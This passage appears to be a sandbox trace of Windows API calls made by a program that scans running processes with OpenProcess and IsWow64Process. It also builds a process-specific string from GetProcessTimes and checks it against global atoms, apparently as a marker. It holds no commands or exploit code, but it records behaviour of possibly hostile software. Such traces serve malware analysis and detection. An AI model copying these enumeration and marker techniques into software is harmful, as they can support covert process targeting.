	[0117.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.108] CloseHandle (hObject=0x698) returned 1
	[0117.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.108] CloseHandle (hObject=0x698) returned 1
	[0117.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.108] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.109] CloseHandle (hObject=0x698) returned 1
	[0117.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.109] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.109] CloseHandle (hObject=0x698) returned 1
	[0117.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.109] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.109] CloseHandle (hObject=0x698) returned 1
	[0117.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.109] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.109] CloseHandle (hObject=0x698) returned 1
	[0117.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.109] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.109] CloseHandle (hObject=0x698) returned 1
	[0117.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.109] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.110] CloseHandle (hObject=0x698) returned 1
	[0117.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.110] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.110] CloseHandle (hObject=0x698) returned 1
	[0117.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.110] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.110] CloseHandle (hObject=0x698) returned 1
	[0117.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.110] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.110] CloseHandle (hObject=0x698) returned 1
	[0117.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.110] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.110] CloseHandle (hObject=0x698) returned 1
	[0117.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.110] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.110] CloseHandle (hObject=0x698) returned 1
	[0117.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.111] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.111] CloseHandle (hObject=0x698) returned 1
	[0117.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.111] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.111] CloseHandle (hObject=0x698) returned 1
	[0117.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.111] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.111] CloseHandle (hObject=0x698) returned 1
	[0117.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.111] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.111] CloseHandle (hObject=0x698) returned 1
	[0117.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.112] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.112] CloseHandle (hObject=0x698) returned 1
	[0117.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.112] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.112] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.112] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.112] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.113] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.113] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.113] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.114] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.114] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.114] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.114] CloseHandle (hObject=0x698) returned 1
	[0117.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.114] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.114] CloseHandle (hObject=0x698) returned 1
	[0117.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.114] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.114] CloseHandle (hObject=0x698) returned 1
	[0117.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.115] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.115] CloseHandle (hObject=0x698) returned 1
	[0117.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.150] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.150] CloseHandle (hObject=0x698) returned 1
	[0117.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.150] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.150] CloseHandle (hObject=0x698) returned 1
	[0117.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.150] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.150] CloseHandle (hObject=0x698) returned 1
	[0117.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.151] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.151] CloseHandle (hObject=0x698) returned 1
	[0117.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.151] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.151] CloseHandle (hObject=0x698) returned 1
	[0117.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.151] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.151] CloseHandle (hObject=0x698) returned 1
	[0117.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.151] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.151] CloseHandle (hObject=0x698) returned 1
	[0117.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.152] CloseHandle (hObject=0x698) returned 1
	[0117.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.152] CloseHandle (hObject=0x698) returned 1
	[0117.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.152] CloseHandle (hObject=0x698) returned 1
	[0117.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.152] CloseHandle (hObject=0x698) returned 1
	[0117.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.153] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.153] CloseHandle (hObject=0x698) returned 1
	[0117.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.153] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.153] CloseHandle (hObject=0x698) returned 1
	[0117.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.153] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.153] CloseHandle (hObject=0x698) returned 1
	[0117.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.154] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.154] CloseHandle (hObject=0x698) returned 1
	[0117.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.154] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.154] CloseHandle (hObject=0x698) returned 1
	[0117.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.154] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.154] CloseHandle (hObject=0x698) returned 1
	[0117.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.154] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.154] CloseHandle (hObject=0x698) returned 1
	[0117.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.154] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.154] CloseHandle (hObject=0x698) returned 1
	[0117.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.155] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.155] CloseHandle (hObject=0x698) returned 1
	[0117.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.155] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.155] CloseHandle (hObject=0x698) returned 1
	[0117.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.155] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.155] CloseHandle (hObject=0x698) returned 1
	[0117.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.155] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.155] CloseHandle (hObject=0x698) returned 1
	[0117.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.155] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.155] CloseHandle (hObject=0x698) returned 1
	[0117.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.156] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.156] CloseHandle (hObject=0x698) returned 1
	[0117.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.156] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.156] CloseHandle (hObject=0x698) returned 1
	[0117.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.156] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.156] CloseHandle (hObject=0x698) returned 1
	[0117.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.156] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.156] CloseHandle (hObject=0x698) returned 1
	[0117.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.157] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.157] CloseHandle (hObject=0x698) returned 1
	[0117.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.157] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.157] CloseHandle (hObject=0x698) returned 1
	[0117.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.157] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.157] CloseHandle (hObject=0x698) returned 1
	[0117.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.157] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.158] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.158] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.158] wsprintfA (in: param_1=0x3993498, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.158] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.159] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.159] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.159] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.159] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.159] CloseHandle (hObject=0x698) returned 1
	[0117.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.159] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.159] CloseHandle (hObject=0x698) returned 1
	[0117.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.159] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.159] CloseHandle (hObject=0x698) returned 1
	[0117.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.160] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.160] CloseHandle (hObject=0x698) returned 1
	[0117.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.197] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.197] CloseHandle (hObject=0x698) returned 1
	[0117.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.197] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.197] CloseHandle (hObject=0x698) returned 1
	[0117.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.198] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.198] CloseHandle (hObject=0x698) returned 1
	[0117.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.198] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.198] CloseHandle (hObject=0x698) returned 1
	[0117.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.198] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.198] CloseHandle (hObject=0x698) returned 1
	[0117.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.198] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.198] CloseHandle (hObject=0x698) returned 1
	[0117.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.198] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.199] CloseHandle (hObject=0x698) returned 1
	[0117.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.199] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.199] CloseHandle (hObject=0x698) returned 1
	[0117.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.199] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.199] CloseHandle (hObject=0x698) returned 1
	[0117.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.199] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.199] CloseHandle (hObject=0x698) returned 1
	[0117.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.200] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.200] CloseHandle (hObject=0x698) returned 1
	[0117.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.200] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.200] CloseHandle (hObject=0x698) returned 1
	[0117.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.200] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.200] CloseHandle (hObject=0x698) returned 1
	[0117.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.200] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.200] CloseHandle (hObject=0x698) returned 1
	[0117.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.200] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.200] CloseHandle (hObject=0x698) returned 1
	[0117.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.201] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.201] CloseHandle (hObject=0x698) returned 1
	[0117.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.201] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.201] CloseHandle (hObject=0x698) returned 1
	[0117.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.201] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.201] CloseHandle (hObject=0x698) returned 1
	[0117.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.201] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.201] CloseHandle (hObject=0x698) returned 1
	[0117.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.202] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.202] CloseHandle (hObject=0x698) returned 1
	[0117.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
